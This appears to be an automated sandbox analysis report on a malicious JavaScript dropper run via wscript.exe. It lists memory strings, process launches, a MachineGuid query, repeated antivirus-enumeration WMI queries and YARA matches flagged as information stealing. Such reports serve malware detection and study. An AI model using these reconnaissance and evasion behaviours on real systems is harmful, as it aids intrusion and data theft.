Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sizestoredinpagingfiles
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uint16sizestoredinpagingfiles
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: status
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uint64status
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: systemdevice
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uint32systemdevice
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: systemdirectory
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stringsystemdirectory
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: systemdrive
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stringsystemdrive
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: desktop-716t771
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: computer!
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: athtosignedprodu
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: not_nul
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: -9e44-da
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 5-9e44-da
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: defender
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: win32_operatingsystem
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: {082927ab-dedc-4263-82f9-82a923849650}
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: win32_operatingsystem{082927ab-dedc-4263-82f9-82a923849650}+
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1root\cimv2c
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: win32_operatingsystem{082927ab-dedc-4263-82f9-82a923849650}/
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: af_unixf
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: msafd tcpip [tcp/ip]2\mswsock.dll,-60100
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: msafd tcpip [udp/ip]2\mswsock.dll,-60101
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: msafd tcpip [raw/ip]2\mswsock.dll,-60102f
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: msafd tcpip [tcp/ipv6]mswsock.dll,-60200
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: msafd tcpip [udp/ipv6]mswsock.dll,-60201
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: msafd tcpip [raw/ipv6]mswsock.dll,-60202f
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rsvp tcpv6 service providers.dll,-100f
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rsvp tcp service providerqos.dll,-101&
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rsvp udpv6 service providers.dll,-102&
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rsvp udp service providerqos.dll,-103&
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hyper-v raw
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: msafd irda [irda]
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\windows\system32;c:\windows\system32;c:\windows\system;c:\windows;.;c:\program files (x86)\common files\oracle\java\javapath;c:\windows\system32;c:\windows;c:\windows\system32\wbem;c:\windows\system32\windowspowershell\v1.0\;c:\windows\system32\openssh\;c:\users\user\appdata\local\microsoft\windowsapps;
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rsvp tcp service provider9
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: msafd irda [irda]f
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 202 (,
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 7t;h0h<
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 7$3t
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 0|2l#89
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: )\8t*
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d7l4d=
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 8@1l$d=
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ecuritycenterfication window
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ecuritycenter
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: url moniker notification window
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rsvp tcpv6 service provider
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: (<pdx
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $8l`t
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.js Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.js Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.862567864.00000228B31AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.379605818.00000228B314F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.851874113.00000228B3130000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.379274839.00000228B317E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.379481262.00000228B319F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.818173441.00000228B09F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.378710691.00000228B3161000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.400937487.0000025291B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401267934.0000025291B77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401644606.0000025291B83000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: wscript.exe, 00000001.00000003.379274839.00000228B317E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.379726865.00000228B3194000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.378710691.00000228B3161000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \Windows Defender\MsMpeng.exe
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct

Stealing of Sensitive Information

barindex
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000002.00000003.346293587.0000025291B28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.894056339.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.525478987.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.436933297.000001A3A0C9D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.882434337.000001B9F39C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359362375.0000020CC9D9D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.436804080.000001A3A0C8A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.475419032.000001B9F3810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.306663834.0000023FB2AA9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.365466857.0000020CC9121000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.346110513.0000025291AEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.345846246.0000025291B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.525911410.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.436967612.000001A3A0CC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.362775717.0000020CC9DC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.870934692.00000252913C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.459088306.000001A3A05B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359178897.0000020CC9DA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.360228659.0000020CC9120000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.524775302.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.442339424.000001A3A0CC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.312164849.0000023FB2B5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.364188132.0000020CC934C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.307173276.0000023FB2943000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.857351439.0000025290FE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.306477021.0000023FB35AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.473292279.000001B9F43D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.437852144.000001A3A0010000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.306511935.0000023FB35C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.347539680.0000025290E23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.878368097.0000025291B0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.525586861.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.311353679.0000023FB35E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.307581623.0000023FB294F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359292280.0000020CC9D8A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.346359959.0000025290FB6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.473654682.000001B9F43BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.473826322.000001B9F43CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.360037491.0000020CC9113000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.436996885.000001A3A01A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.346253406.0000025291AFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.443498942.000001A3A024C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.436753264.000001A3A0CA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.473870911.000001B9F3994000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359409394.0000020CC92A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.347965187.0000025290E30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.525101810.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.889666132.0000025291B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.475028155.000001B9F3803000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.380509963.0000020CC9C80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.324728490.0000023FB34A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.883442418.000001B9F3D60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.839366000.0000025290DE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wscript.exe PID: 672, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 2332, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 1248, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 5292, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 1956, type: MEMORYSTR
Source: Yara match File source: 0000000E.00000002.845740262.000001E45640E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.546167949.000001E45640E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.848811043.0000026E2ADF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
